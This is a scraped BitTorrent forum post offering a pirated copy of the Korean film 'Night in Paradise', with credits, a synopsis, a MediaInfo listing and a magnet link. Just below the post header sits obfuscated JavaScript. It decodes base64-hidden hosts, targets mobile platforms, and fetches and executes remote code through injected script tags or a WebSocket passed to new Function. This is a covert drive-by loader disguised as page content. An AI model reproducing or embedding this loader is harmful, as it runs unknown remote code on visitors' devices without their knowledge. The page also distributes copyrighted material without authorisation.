乐园之夜[中文字幕].Night.in.Paradise.2021.NF.1080p.WEB-DL.Atmos.DDP5.1.x264 7.76GB

版主小s 1月前 1096

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 乐园之夜 / 暗夜天堂 / 天堂长夜 / Night in Paradise
◎片  名 ??? ?
◎年  代 2020
◎产  地 韩国
◎类  别 剧情
◎语  言 韩语
◎上映日期 2020-09-02(威尼斯电影节) / 2021-04-09(韩国网络)
◎IMDb链接 https://www.imdb.com/title/tt12792418/
◎豆瓣评分 6.7/10 (4545人评价)
◎豆瓣链接 https://movie.douban.com/subject/33771840/
◎片  长 132分钟
◎导  演 朴勋政 Hoon-jung Park (id:1319989)
◎编  剧 朴勋政 Hoon-jung Park (id:1319989)
◎演  员 严泰九 Tae-goo Eom (id:1345798)
       全余赟 Jeon Yeo-bin (id:1378641)
       车胜元 Seung-won Cha (id:1018779)
       赵东仁 Dong-in Cho (id:1380772)
       朴浩山 Ho-san Park (id:1382564)
       玄奉植 Bong-shik Hyun (id:1383270)
       车顺裴 Cha Soon-bae (id:1377778)
       孙秉浩 Byung-ho Son (id:1024148)
       李文植 Mun-shik Lee (id:1274621)
       安世彬 Se-bin Ahn (id:1440635)
       张荣男 Young-nam Jang (id:1170566)
       格雷格·秦 Greg Chun (id:1177439)
       诺希尔·达拉尔 Noshir Dalal (id:1456886)
       安吉拉·林 Angela Lin (id:1223786)
       马修·杨·金 Matthew Yang King (id:1392062)
       基内·扬 Keone Young (id:1166349)

◎标  签 黑帮 / 韩国 / 犯罪 / 韩国电影 / 剧情 / 韩影 / 2020 / 威尼斯电影节

◎简  介
  影片围绕着一个男人和一个女人分别展开,男人是某组织的头号目标人物,而女人则处在生命的尽头。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 119685636793286387652133746927205902332 (0x5A0A9D7C85F5D23107FAF81A8A7867FC)

  4. Complete name                            : [email protected]BQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 7.76 GiB

  8. Duration                                 : 2 h 12 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 8 418 kb/s

  11. Encoded date                             : UTC 2021-08-19 16:37:04

  12. Writing application                      : mkvmerge v55.0.0 ('Waiting For Space') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID                                       : 1

  16. Format                                   : AVC

  17. Format/Info                              : Advanced Video Codec

  18. Format profile                           : [email protected]

  19. Format settings                          : CABAC / 4 Ref Frames

  20. Format settings, CABAC                   : Yes

  21. Format settings, Reference frames        : 4 frames

  22. Codec ID                                 : V_MPEG4/ISO/AVC

  23. Duration                                 : 2 h 12 min

  24. Bit rate mode                            : Variable

  25. Bit rate                                 : 7 649 kb/s

  26. Maximum bit rate                         : 20.0 Mb/s

  27. Width                                    : 1 920 pixels

  28. Height                                   : 1 080 pixels

  29. Display aspect ratio                     : 16:9

  30. Frame rate mode                          : Constant

  31. Frame rate                               : 23.976 (24000/1001/53354) FPS

  32. Color space                              : YUV

  33. Chroma subsampling                       : 4:2:0

  34. Bit depth                                : 8 bits

  35. Scan type                                : Progressive

  36. Bits/(Pixel*Frame)                       : 0.154

  37. Stream size                              : 7.05 GiB (91%)

  38. Writing library                          : x264 core 148 r2722 1b0121b

  39. Encoding settings                        : cabac=1 / ref=4 / deblock=1:0:0 / analyse=0x3:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=120 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=2 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=16 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=121 / scenecut=0 / intra_refresh=0 / rc_lookahead=240 / rc=crf / mbtree=1 / crf=16.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / vbv_maxrate=20000 / vbv_bufsize=25000 / crf_max=0.0 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:0.80

  40. Default                                  : Yes

  41. Forced                                   : No


  42. Audio #1

  43. ID                                       : 2

  44. Format                                   : E-AC-3

  45. Format/Info                              : Enhanced AC-3

  46. Commercial name                          : Dolby Digital Plus

  47. Codec ID                                 : A_EAC3

  48. Duration                                 : 2 h 12 min

  49. Bit rate mode                            : Constant

  50. Bit rate                                 : 640 kb/s

  51. Channel(s)                               : 6 channels

  52. Channel layout                           : L R C LFE Ls Rs

  53. Sampling rate                            : 48.0 kHz

  54. Frame rate                               : 31.250 FPS (1536 SPF)

  55. Compression mode                         : Lossy

  56. Stream size                              : 604 MiB (8%)

  57. Language                                 : Korean

  58. Service kind                             : Complete Main

  59. Default                                  : Yes

  60. Forced                                   : No


  61. Audio #2

  62. ID                                       : 3

  63. Format                                   : E-AC-3

  64. Format/Info                              : Enhanced AC-3

  65. Commercial name                          : Dolby Digital Plus

  66. Codec ID                                 : A_EAC3

  67. Duration                                 : 2 h 12 min

  68. Bit rate mode                            : Constant

  69. Bit rate                                 : 128 kb/s

  70. Channel(s)                               : 2 channels

  71. Channel layout                           : L R

  72. Sampling rate                            : 48.0 kHz

  73. Frame rate                               : 31.250 FPS (1536 SPF)

  74. Compression mode                         : Lossy

  75. Stream size                              : 121 MiB (2%)

  76. Language                                 : Korean

  77. Service kind                             : Complete Main

  78. Default                                  : No

  79. Forced                                   : No


  80. Text #1

  81. ID                                       : 4

  82. Format                                   : UTF-8

  83. Codec ID                                 : S_TEXT/UTF8

  84. Codec ID/Info                            : UTF-8 Plain Text

  85. Duration                                 : 2 h 11 min

  86. Bit rate                                 : 32 b/s

  87. Count of elements                        : 1313

  88. Stream size                              : 31.4 KiB (0%)

  89. Title                                    : 简体中文

  90. Language                                 : Chinese

  91. Default                                  : Yes

  92. Forced                                   : No


  93. Text #2

  94. ID                                       : 5

  95. Format                                   : UTF-8

  96. Codec ID                                 : S_TEXT/UTF8

  97. Codec ID/Info                            : UTF-8 Plain Text

  98. Duration                                 : 2 h 11 min

  99. Bit rate                                 : 33 b/s

  100. Count of elements                        : 1311

  101. Stream size                              : 31.7 KiB (0%)

  102. Title                                    : 繁體中文

  103. Language                                 : Chinese

  104. Default                                  : No

  105. Forced                                   : No


  106. Text #3

  107. ID                                       : 6

  108. Format                                   : UTF-8

  109. Codec ID                                 : S_TEXT/UTF8

  110. Codec ID/Info                            : UTF-8 Plain Text

  111. Duration                                 : 2 h 11 min

  112. Bit rate                                 : 62 b/s

  113. Count of elements                        : 1696

  114. Stream size                              : 59.8 KiB (0%)

  115. Title                                    : CC

  116. Language                                 : Korean

  117. Default                                  : No

  118. Forced                                   : No



TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:BD2F39985E81BEDB08077D80E6EF5D7FD4791576
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖